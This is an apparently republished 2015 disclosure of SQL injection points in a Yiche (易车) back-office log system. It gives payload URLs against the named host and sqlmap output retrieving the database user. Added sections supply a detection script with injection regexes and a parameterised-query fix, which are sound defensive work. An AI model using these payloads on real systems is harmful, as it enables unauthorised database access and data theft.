
Multiple SQL injection points in a Yiche (易车) system, bundled together

2015-05-15 07:41

Noticed that a lot of people have been submitting Yiche vulnerabilities lately, so I'm joining in.

Affected site:

http://log.yiqi.autodmp.cig.com.cn/

I logged in with an account collected earlier to take a look, and found a pile of injection points:



1. Search-field injection:

http://log.yiqi.autodmp.cig.com.cn/dealers/get_list_bypager?m_pageindex=1&m_pagesize=10&m_provinceid=330000%09%09%09%09%09%09%09%' and '%'='&m_areaid=&m_area2id=&m_keyword=%E4%B8%9C%E9%98%B3%'+and+'%'='&1427551508291



2. Boolean-based blind injection:

http://log.yiqi.autodmp.cig.com.cn/lms_api/stat/get_stat_product_list?start_time=20150228%20and%201=1&end_time=20150328 and 1=1&page_size=0&graph_type=table&1427551564107



The start_time and end_time parameters are injectable throughout the whole site.



3. ORDER BY injection:

http://log.yiqi.autodmp.cig.com.cn/lms_api/clue/get_clue_list_bypaper?starttime=1425132344&endtime=1427551544&page_index=1&page_size=20&approach=&channel=&carmodel=&meida=&province=&city=&district=&dealer=&cartype=&state=&activity=&keyword=&sortfield=post_time&sort=desc&gtype=1&verify_status=&1427551576702



Both parameters in sortfield=post_time&sort=desc can be used for ORDER BY injection, for example sort=desc,if(1=1,1,(select 1 union select 2))



There are probably many other injection points; I won't list them one by one, check for yourselves.
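As an added example that is not part of the original report, the following Python detector runs over constructed web-server access-log lines (placeholder client IPs, no host) that reproduce the three request shapes listed above plus one benign request, decodes each query parameter, and reports which parameter matched which indicator: a quote character breaking out of a string, an "and N=N" tautology in a numeric/date field, or an expression such as if(...) / union / select in a sort parameter. The log format and the rule set are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not real traffic): three request shapes from the
# report, with a placeholder client IP, followed by one benign search request.
SAMPLE_LOG = """\
10.0.0.5 - - [15/May/2015:07:41:01 +0800] "GET /dealers/get_list_bypager?m_pageindex=1&m_pagesize=10&m_provinceid=330000&m_keyword=%E4%B8%9C%E9%98%B3%'+and+'%'=' HTTP/1.1" 200 512
10.0.0.5 - - [15/May/2015:07:41:02 +0800] "GET /lms_api/stat/get_stat_product_list?start_time=20150228%20and%201=1&end_time=20150328&page_size=0 HTTP/1.1" 200 77
10.0.0.5 - - [15/May/2015:07:41:03 +0800] "GET /lms_api/clue/get_clue_list_bypaper?sortfield=post_time&sort=desc,if(1=1,1,(select%201%20union%20select%202)) HTTP/1.1" 200 3051
10.0.0.9 - - [15/May/2015:07:41:04 +0800] "GET /dealers/get_list_bypager?m_pageindex=1&m_pagesize=10&m_keyword=%E4%B8%9C%E9%98%B3 HTTP/1.1" 200 2048
"""

# Common log format (assumption): ip ident user [time] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)

# Indicators applied to each *decoded* parameter value; first matching rule wins.
RULES = [
    ("quote_break", re.compile(r"'")),
    ("boolean_tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("orderby_expression", re.compile(r"\b(if|case)\s*\(|\bunion\b|\bselect\b", re.I)),
]


def decoded_params(path):
    """Return the request's query parameters as {name: first decoded value}."""
    query = urlsplit(path).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def scan_request(path):
    """List (parameter, rule) pairs for every parameter that trips an indicator."""
    hits = []
    for name, value in decoded_params(path).items():
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.append((name, rule))
                break
    return hits


def scan_log(text):
    """Parse each log line and collect an alert for every request with hits."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than crash
        hits = scan_request(m.group("path"))
        if hits:
            alerts.append({
                "ip": m.group("ip"),
                "endpoint": urlsplit(m.group("path")).path,
                "hits": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["endpoint"], alert["hits"])
```

The rules are deliberately narrow so that the benign request from 10.0.0.9 (a plain keyword search) produces no alert; in practice the quote rule in particular will need tuning per parameter, since some legitimate free-text fields contain apostrophes.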


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: m_keyword (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: m_pageindex=1&m_pagesize=10&m_provinceid=330000&m_areaid=&m_area2id=&m_keyword=%E4%B8%9C%E9%98%B3%%' AND 2230=2230 AND '%'='&1427551508291

---

[22:14:33] [INFO] testing MySQL

[22:14:33] [INFO] confirming MySQL

[22:14:33] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.3.9

back-end DBMS: MySQL >= 5.0.0

[22:14:33] [INFO] fetching current user

[22:14:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[22:14:33] [INFO] retrieved: autodmp_dealer@%

current user: 'autodmp_dealer@%'

Fix:

Back-office systems need proper security hardening too; otherwise they become an entry point into the internal network.
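The application is PHP on MySQL, but the fix is the same in any stack and has two parts, which the following Python/sqlite3 sketch shows as an added example (not the site's own code): the search keyword is passed as a bound parameter with its LIKE metacharacters escaped, so the quote-based payload from the first injection point becomes plain text; sortfield and sort, which cannot be bound inside an ORDER BY clause, are checked against an allow-list, so the if(...) payload from the third point is rejected outright; and start_time/end_time are validated as YYYYMMDD before they reach the query. Table and column names and the date format are assumptions for the example.

```python
import re
import sqlite3

# Allow-lists for the two ORDER BY parameters. The column names are assumed for
# this example; the real schema is not on the page.
ALLOWED_SORT_FIELDS = {"post_time", "name"}
ALLOWED_SORT_DIRS = {"asc", "desc"}
# start_time / end_time are treated as YYYYMMDD (assumption based on the sample URL).
DATE_RE = re.compile(r"^\d{8}$")


class RejectedParameter(ValueError):
    """Raised when a request parameter fails validation; the request should get a 400."""


def validate_sort(sortfield, sort):
    """ORDER BY cannot take bound parameters, so both column and direction are allow-listed."""
    if sortfield not in ALLOWED_SORT_FIELDS:
        raise RejectedParameter(f"sortfield not allowed: {sortfield!r}")
    if sort.lower() not in ALLOWED_SORT_DIRS:
        raise RejectedParameter(f"sort not allowed: {sort!r}")
    return sortfield, sort.upper()


def validate_date(value):
    """Accept only an 8-digit date; '20150228 and 1=1' is rejected, not repaired."""
    if not DATE_RE.fullmatch(value):
        raise RejectedParameter(f"date is not YYYYMMDD: {value!r}")
    return value


def escape_like(value):
    """Escape LIKE metacharacters so user input only ever matches literally."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_dealers(conn, keyword, sortfield="post_time", sort="desc"):
    """Keyword is bound as a parameter; sort column/direction come from the allow-list."""
    field, direction = validate_sort(sortfield, sort)
    # Only allow-listed identifiers are interpolated; the keyword never is.
    sql = (f"SELECT name FROM dealers WHERE name LIKE ? ESCAPE '\\' "
           f"ORDER BY {field} {direction}")
    rows = conn.execute(sql, (f"%{escape_like(keyword)}%",)).fetchall()
    return [row[0] for row in rows]


def make_demo_db():
    """In-memory table with constructed rows (not data from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dealers (name TEXT, post_time INTEGER)")
    conn.executemany("INSERT INTO dealers VALUES (?, ?)", [
        ("东阳汽车", 1427551000),
        ("杭州汽车", 1427552000),
        ("东阳二店", 1427553000),
    ])
    return conn


if __name__ == "__main__":
    conn = make_demo_db()
    print(search_dealers(conn, "东阳"))              # literal matches, newest first
    print(search_dealers(conn, "东阳%' and '%'="))   # bound as text: no match, no injection
    for bad in [("post_time", "desc,if(1=1,1,(select 1 union select 2))")]:
        try:
            validate_sort(*bad)
        except RejectedParameter as err:
            print("rejected:", err)
```

The point of the allow-list is that escaping does not help for ORDER BY: the column name and direction are SQL identifiers and keywords, not string values, so the only safe option is to map the request parameter onto a fixed set of known-good choices.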

Source: www.2cto.com/Article/201505/399302.html
